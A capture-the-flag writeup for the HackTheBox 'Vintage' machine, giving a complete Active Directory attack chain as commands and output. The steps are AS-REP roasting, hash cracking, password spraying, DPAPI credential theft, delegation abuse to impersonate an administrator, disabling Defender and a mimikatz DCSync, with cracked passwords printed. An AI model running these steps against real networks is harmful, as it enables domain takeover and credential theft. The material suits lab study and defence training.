Post

HackTheBox Vintage Writeup

Posted
By x3ric
4 min read

Explore the fundamentals of cybersecurity in the Vintage Capture The Flag (CTF) challenge, a hard-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

1

10.10.11.45 dc01.vintage.htb vintage.htb

Script to add hosts automatically

1
2
3

ip="10.10.11.45"
domain="dc01.vintage.htb vintage.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

1

nmap -sCV vintage.htb -Pn

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

Nmap scan report for vintage.htb (10.10.11.45)
Host is up (0.054s latency).
rDNS record for 10.10.11.45: dc01.vintage.htb
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-03 23:59:56Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-12-04T00:00:04
|_  start_date: N/A
|_clock-skew: -8s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Provided Credentials P.Rosa : Rosaisbest123

bloodhound

Ldap user list

1

ldapsearch -x -H ldap://10.10.11.45 -D "P.Rosa@vintage.htb" -w "Rosaisbest123" -b "DC=vintage,DC=htb" "(objectClass=user)" sAMAccountName | grep "sAMAccountName:" | cut -d " " -f 2 > usernames.txt

Kerberos Tickets

1
2
3

getTGT.py -dc-ip 10.10.11.45 vintage.htb/FS01$:fs01
export KRB5CCNAME=FS01\$.ccache
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k get object 'GMSA01$' --attr msDS-ManagedPassword

1
2
3
4
5

getTGT.py vintage.htb/GMSA01$ -hashes 'aad3b435b51404eeaad3b435b51404ee:a317f224b45046c1446372c4dc06ae53'
export KRB5CCNAME=GMSA01\$.ccache
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add groupMember "SERVICEMANAGERS" "P.Rosa"
getTGT.py vintage.htb/P.Rosa:Rosaisbest123 -dc-ip dc01.vintage.htb
export KRB5CCNAME=P.Rosa.ccache

ASREPRoasting

Disable PREAUTH

1
2
3

bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add uac SVC_ARK -f DONT_REQ_PREAUTH
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add uac SVC_LDAP -f DONT_REQ_PREAUTH
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k add uac SVC_SQL -f DONT_REQ_PREAUTH

Enable Accounts

1
2
3

bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac SVC_ARK -f ACCOUNTDISABLE
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac SVC_LDAP -f ACCOUNTDISABLE
bloodyad --host dc01.vintage.htb -d "VINTAGE.HTB" --dc-ip 10.10.11.45 -k remove uac SVC_SQL -f ACCOUNTDISABLE

1

GetNPUsers.py -dc-ip 10.10.11.45 -request -usersfile usernames.txt vintage.htb/

Resulted hash

1

$krb5asrep$23$svc_sql@VINTAGE.HTB:c65f23feb7e3e10c87e6d1a3a432a9cf$7e3d9e28272e1d10795a0c482b3eb538096577268c8721662befadf2367f5e9bd93dbc458e1b86d0b384005c0cab7e0136acebf277e6db07971a34bb1cb9a58178f4cf05ea3d1b4e4737590ecdf024bba30cd1e0391cb771a26a62374acb61c0253354fd043082c8b21d8eda40957a68a7552d9be122a5bbfa1ca666817c6eaaec5f0ac1083bfb98b1e0e4065f140d8bebefe877ab070e91c6d24d33cacac1105e4517d347af3b5c10ff9b707b2d7b43867d0b3f0556c2130c4cd67d08dfa9fac0571f1df6de7c3bdbcbf39d6121380d38120ff210ff74219fd9fe6ba551e03de9301bef3cbe948b820e

Brute Force the Hash

1
2
3
4
5

echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 18200 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat /tmp/hash.txt --show
rm -rf /tmp/hash.txt

This yields Zer0the0ne

1

kerbrute --dc vintage.htb -d vintage.htb -v passwordspray usernames.txt Zer0the0ne

C.Neri@vintage.htb:Zer0the0ne

Remember, /etc/krb5.conf is needed, but make sure to remove it after pwning the box, as it can interfere with future pwns.

1
2
3
4
5

getTGT.py vintage.htb/c.neri:Zer0the0ne -dc-ip vintage.htb
echo -e '[libdefaults]\n    default_realm = VINTAGE.HTB\n    dns_lookup_kdc = false\n    rdns = false\n\n[realms]\n    VINTAGE.HTB = {\n        kdc = 10.10.11.45\n        admin_server = 10.10.11.45\n    }\n\n[domain_realm]\n    .vintage.htb = VINTAGE.HTB\n    vintage.htb = VINTAGE.HTB
' | sudo tee /etc/krb5.conf
export KRB5CCNAME=c.neri.ccache
evil-winrm -i dc01.vintage.htb -r vintage.htb

1
2

cat ../Desktop/user.txt
whoami /priv

DPAPI Credentials

The WinRM download wasn’t working until I removed its hidden property, though I’m not sure why.

1
2
3
4
5
6

cd 'C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials'
Set-ItemProperty -Path .\C4BB96844A5C9DD45D5B6A9859252BA6 -Name Attributes -Value ([System.IO.FileAttributes]::Normal)
download C4BB96844A5C9DD45D5B6A9859252BA6
cd 'C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115'
Set-ItemProperty -Path '.\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b' -Name Attributes -Value ([System.IO.FileAttributes]::Normal)
download '99cf41a3-a552-4cf7-a8d7-aca2d6f7339b'

Local:

1
2

dpapi.py masterkey -file '99cf41a3-a552-4cf7-a8d7-aca2d6f7339b' -sid 'S-1-5-21-4024337825-2033394866-2055507597-1115' -password Zer0the0ne
dpapi.py credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key '0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a'

c.neri_adm:Uncr4ck4bl3P4ssW0rd0312

Delegation and SPN Attack

1
2
3
4
5
6
7
8
9
10
11

export KRB5CCNAME=c.neri.ccache
bloodyad -k --host dc01.vintage.htb -d VINTAGE.HTB remove uac SVC_SQL -f ACCOUNTDISABLE
bloodyad -k --host dc01.vintage.htb -d VINTAGE.HTB set object 'SVC_SQL' servicePrincipalName -v "cifs/x"
getTGT.py  -dc-ip 10.10.11.45 'VINTAGE.HTB/c.neri_adm:Uncr4ck4bl3P4ssW0rd0312'
export KRB5CCNAME=c.neri_adm.ccache
bloodyad -k --host dc01.vintage.htb -d vintage.htb add groupMember "delegatedadmins" "svc_sql"
getTGT.py  -dc-ip 10.10.11.45 'VINTAGE.HTB/svc_sql:Zer0the0ne'
export KRB5CCNAME=svc_sql.ccache
getST.py -spn 'cifs/dc01.vintage.htb' -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'vintage.htb/svc_sql:Zer0the0n'
export KRB5CCNAME=L.BIANCHI_ADM.ccache
wmiexec.py -k -no-pass VINTAGE.HTB/L.BIANCHI_ADM@dc01.vintage.htb -dc-ip 10.10.11.45

1

type Users\Administrator\Desktop\root.txt

1
2
3

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $True"
lput ./.local/www/win/creds/mimikatz.exe
mimikatz.exe "privilege::debug" "lsadump::dcsync /user:administrator" "exit"

468c7497513f8243b59980f2240a10de

machine
htb cft writeup windows
This post is licensed under CC BY 4.0 by the author.